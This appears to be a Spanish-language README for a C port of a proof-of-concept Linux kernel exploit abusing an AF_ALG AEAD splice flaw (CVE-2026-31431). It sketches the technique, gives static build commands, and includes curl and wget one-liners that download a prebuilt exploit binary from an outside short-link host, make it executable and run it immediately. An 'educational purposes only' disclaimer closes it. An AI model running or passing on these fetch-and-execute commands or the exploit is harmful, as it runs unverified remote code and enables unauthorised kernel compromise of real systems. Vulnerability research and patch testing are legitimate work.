
Puerto C de una prueba de concepto que explota una falla en la lógica de splice de AEAD AF_ALG del kernel de Linux (CVE-2026-31431) para investigación educativa.
Este proyecto es un port a C del prototipo original en Python, realizado por offsecguy.
Aprovecha la API criptográfica del kernel de Linux (AF_ALG) utilizando:
authencesn(hmac(sha256),cbc(aes))MSG_MOREsplice()La técnica alimenta datos desde un descriptor de archivo de solo lectura a través de un socket criptográfico, procesándolos por fragmentos.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALGzlib para la descompresiónEste código se proporciona únicamente con fines educativos y de investigación.
Úsalo de forma responsable y solo en sistemas que estés autorizado a probar.